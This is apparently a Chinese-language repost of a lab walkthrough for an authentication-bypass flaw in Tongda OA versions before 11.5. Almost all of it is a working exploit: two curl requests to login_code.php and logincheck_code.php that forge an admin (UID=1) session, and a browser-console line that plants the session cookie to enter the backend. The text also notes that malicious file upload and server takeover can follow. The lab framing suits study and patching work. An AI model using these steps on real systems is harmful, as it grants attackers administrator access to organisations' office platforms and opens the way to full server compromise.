转载自:【通达OA < 11.5 前台任意伪造用户登录登录绕过漏洞利用】 -/cn/post/518/
实验地址:/?github=%2Fbbvuln%2Ftdoa%2Ftree%2Fmaster%2F11.3%2Fdc&autogo=1
04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件控制网站服务器。通达OA是通达信科打造的协同办公平台,涵盖了工作流程、电子邮件、即时通讯、公告通知、新闻、日程安排、工作日志、知识管理,等近300个功能模块,国内用户众多。
1.访问 /general/login_code.php 获取 codeuid
curl -v http://***.vsgo.cloud/general/login_code.php
2.用 codeuid 请求 /logincheck_code.php,获取cookie
curl -v -d 'CODEUID=2AF415ED-E5A7-109A-4020-31B9D06ADD3A&UID=1' http://***.vsgo.cloud/logincheck_code.php
浏览器中打开http://***.vsgo.cloud/general/,并在浏览器控制台上执行:
document.cookie="PHPSESSID=67b0bacb8dd8e730c8b0f81303b1513a;"
刷新页面,成功登录后台